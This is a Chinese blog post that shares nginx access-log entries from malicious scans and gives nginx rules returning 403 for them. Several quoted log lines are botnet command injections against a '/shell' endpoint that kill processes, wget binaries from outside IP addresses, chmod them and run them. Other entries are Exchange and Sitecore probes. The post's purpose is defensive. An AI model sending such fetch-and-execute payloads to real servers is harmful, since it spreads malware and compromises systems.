linux恶意请求

已于 2024-08-11 11:20:37 修改
阅读量271 收藏
点赞数 1
文章标签: linux 运维 服务器
于 2024-08-11 01:19:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/janthinasnail/article/details/141098954
版权

nginx访问日志:

162.243.135.29 - - [05/Jan/2024:00:12:07 +0800] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"

107.151.182.54 - - [04/Mar/2024:11:30:06 +0800] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

5.189.156.66 - - [17/Jun/2024:05:37:42 +0800] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+arm7;nohup+wget+http:/\x5C/45.148.120.144/

107.151.182.62 - - [05/Aug/2024:18:07:14 +0800] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

41.142.215.70 - - [06/Aug/2024:02:43:27 +0800] "GET /shell20211028.php HTTP/1.1" 404 555 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"

172.168.40.186 - - [08/Aug/2024:20:30:16 +0800] "GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 153 "-" "Mozilla/5.0 zgrab/0.x"

185.224.128.83 - - [11/Aug/2024:00:09:00 +0800] "GET /shell?cd+/tmp;rm+earm+earm5+earm7;nohup+wget+http:/\x5C/154.216.18.103/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\x5C/154.216.18.103/earm5;chmod+777+earm5;./earm5+jaws;nohup+wget+http:/\x5C/154.216.18.103/earm;chmod+777+earm;./earm+jaws HTTP/1.1" 301 169 "-" "KrebsOnSecurity"

# nginx配置文件增加
# 详见:https://blog.csdn.net/weixin_46084533/article/details/140662309

location / {
    if ( $arg_cd ) {
        return 403;
    }
}



# 如果上述无效,增加下面配置
# 处理以/autodiscover/autodiscover、/sitecore/shell/sitecore、/shell开头请求
location ~* /(autodiscover/autodiscover|sitecore/shell/sitecore|shell) {
    return 403;
}

# 或者,仅处理/shell?cd、/shell?kill、/shell?killall请求
location ~* /shell {
    if ( $query_string ~* (cd|kill|killall) ) {
        return 403;
    }
}

Linux阻止恶意请求:如何阻止以下访问: “GET /shell?cd+/tmp;rm+arm+arm7;nohup+wget+http:/\/147.78.103.44/arm7;chmod+77_nginx 访问记录中shell cd开头的记录-CSDN博客

KrebsOnSecurity

# nginx配置文件增加
# 详见:https://blog.csdn.net/sunsharer/article/details/140776698

location / {
    if ( $http_user_agent ~* KrebsOnSecurity ) {
        return 403;
    }
}

远程代码执行(Remote Code Execution, RCE)攻击案例分析与应对策略-CSDN博客

janthinasnail
关注
懂王一定懂nginx系列(二):nginx封禁恶意请求,没有人比我更懂
404烫烫烫烫的博客
08-10 1059
标题纯属开玩笑哈,不要介意,更多nginx内容请访问从今天开始种树 前言 恶意请求实属烦人,几分钟都能请求几百次,对于小站而言无疑增加了大量负担,辛辛苦苦原创的内容,几分钟被这些恶意请求白嫖个干干净净,泪目。所以针对性的搜集实验了一些方法来尽可能避免这些恶意请求的访问,希望能帮助各位需要的懂懂们。 直接开整 封禁一些特有请求头 作为一个爬虫小手,对毫不限制的请求次数是深恶痛绝,而且大部分人应对基本反爬还会伪造个请求头什么的,但是下面这个ip真是把流氓精神体现得淋漓尽致。 它的访问次数没有截全,一秒钟大.
【安全漏洞】简要分析复现了最近的ProxyShell利用链
HBohan的博客
08-29 873
前言 近日,有研究员公布了自己针对微软的Exchange服务的攻击链的3种利用方式。微软官方虽然出了补丁,但是出于种种原因还是有较多用户不予理会,导致现在仍然有许多有漏洞的服务暴露在公网中,本文主要在原理上简要分析复现了最近的ProxyShell利用链。 1.ProxyLogon: The most well-known pre-auth RCE chain 2.ProxyOracle: A plaintext-password recovery attacking chain 3.ProxyShell:
exchange邮箱服务请求伪造自己命令执行漏洞
qq_46391084的博客
10-08 1434
微软Exchange Server 服务存在服务端请求伪造漏洞和远程命令执行漏洞。未经身份验证的攻击者可利用ExchangeServer存在的服务端请求伪造漏洞绕过相关权限验证,进而利用Exchange Server的远程代码执行漏洞,在目标系统上执行任意代码。 该漏洞影响所有Exchange Server版本,目前微软暂未发布漏洞补丁。 如受影响,可通过在IIS服务器中添加新的URL重写规则缓解,具体操作步骤如下: 1.在默认站点的自动发现子选项的URL重写属性中添加新的请求阻止规则。 2.
提高日志分析效率的几个小手段
fix_bugs的专栏
01-07 945
提高日志分析效率的几个小手段,涉及标记、多词匹配、非逻辑、分页、常用正则等。
端口扫描工具终极用法
Zt_Zk的博客
09-11 2596
为什么要做c段探测,运营商分配给IDC机房地址时大部分都是连续IP地址,租给客户(渗透目标)时很大概率会分配同C段内IP地址(除非目标就一个IP地址),使用工具扫描可以探测出同段服务。
exchange proxyshell漏洞学习
Shanfenglan's blog
09-10 4079
文章目录1. proxyshell1.1 影响版本1.2 CVE-2021-34473参考文章 1. proxyshell proxyshell利用链由三个cve组成,分别如下: — CVE-2021-34473 - 预认证路径混淆导致 ACL 绕过 — CVE-2021-34523 - Exchange PowerShell 后端的特权提升 — CVE-2021-31207 - 后认证任意文件写入导致 RCE 使用 ProxyShell,未经身份验证的攻击者可以通过暴露的 443 端口在 Microso
内网域森林之ProxyNotShell漏洞利用
最新发布
Ms08067安全实验室
08-02 531
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。 ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。ProxyNotShell利用链的第一...
linux利用CSF防火墙屏蔽恶意请求
01-20
最近不知道为什么,恶意代理的请求数越来越多,明明我返回的都是403Forbidden,但是由于数量实在庞大,还是消耗了我大量的带宽和资源。之前的方法已经没有用了,想了半天还是研究研究防火墙吧,虽然仅仅靠Apache也能...
Linux下对任意Http请求重定向.pdf
09-07
- **安全防护**:拦截错误的或恶意的HTTP请求,防止对内部网络的攻击。 - **流量监控**:在企业网络环境中,可以用来监测和统计员工的HTTP访问行为。 6. 注意事项 - 重定向可能会对性能造成一定影响,需要评估并...
roblox-linux-wrapper:这是一个包含Roblox Linux包装器最新资源的存储库。 我们愿意接受任何(非恶意请求请求
05-02
解决此问题的唯一方法是,如果Wine上游能够足够高地支持VMProtect,或者Roblox自己发布了Linux构建。 该脚本本身仍将在Linux上安装Roblox,但不要期望能够在线播放。 信息 Roblox既不创建也不正式支持该脚本。 它是...
linux防止恶意解析
10-20
根据提供的文件信息,我们可以深入探讨如何在Linux系统中设置Apache Web服务器来防止恶意解析的问题。 ### Linux 防止恶意解析 #### 背景介绍 在互联网环境中,域名解析是用户访问网站的重要环节。然而,恶意解析...
nginx使用301过滤黑客攻击
lionking1990的博客
05-14 1588
nginx使用301过滤黑客攻击nginx使用301过滤黑客攻击奇怪的访问被攻击内容开始防御日志的改进成果结论 nginx使用301过滤黑客攻击 2020/5/9随便翻看了一下公司网站的访问日志,发现有不少来自国外的攻击。 公司的网站只是用来宣传的,从搭建到设计都是我一个人做的,没有做得很华丽,也没有特别多的功能。 奇怪的访问 因为调度gzip压缩功能,所以看了一下日志。发现里面有不少404和400,截取一部分如下 77.247.108.77 - - [09/May/2020:11:51:30 +0900]
常用浏览器user_agent大全
weixin_34327223的博客
05-10 275
2019独角兽企业重金招聘Python工程师标准>>> ...
远程代码执行(Remote Code Execution, RCE)攻击案例分析与应对策略
尚贤达谭工的博客
07-29 1543
最近网站监测到一批以用户代理为 KrebsOnSecurity 的IP对网站进行的RCE攻击。
Nginx 日志中的各种爬虫汇总和屏蔽操作
xhx836161547的博客
03-13 1653
转载原作者的一篇有关nginx的流量记录
Web安全:使用HSTS阻挡中间人攻击
小厂程序员
07-30 1364
背景介绍 之前在自己的服务器上架设了博客并发布到了公网,考虑到安全性还特意加了HTTPS支持。稳定运行一段时间之后前两个星期忽然就无法访问了,以下是我的破案纪实。 案发现场:博客无法访问 之前搭建的博客突然不能访问了,浏览器提示重定向次数过多,我就有了不好的预感,去服务器上看扫了一眼nginx访问日志,果然发现了一点猫腻。 41.230.21.146 - - [26/Jul/2020:04:06:50 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invoke
linux 下如何强制关闭正在运行的程…
奋斗的PIG
04-25 5969
今天在linux下遇到了一个问题,就是用bashee播放音乐的时候, 后来出现了bashee没有反应的情况 于是想到了强制杀死这个进程 上网查了一下,有的人是这样做的 Ctrl+Alt+F1 login $ ps -A $ kill -9 **** $ exit Alt+F7 也可以就是直接在终端下运行 $ps -A $kill -9 *****
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值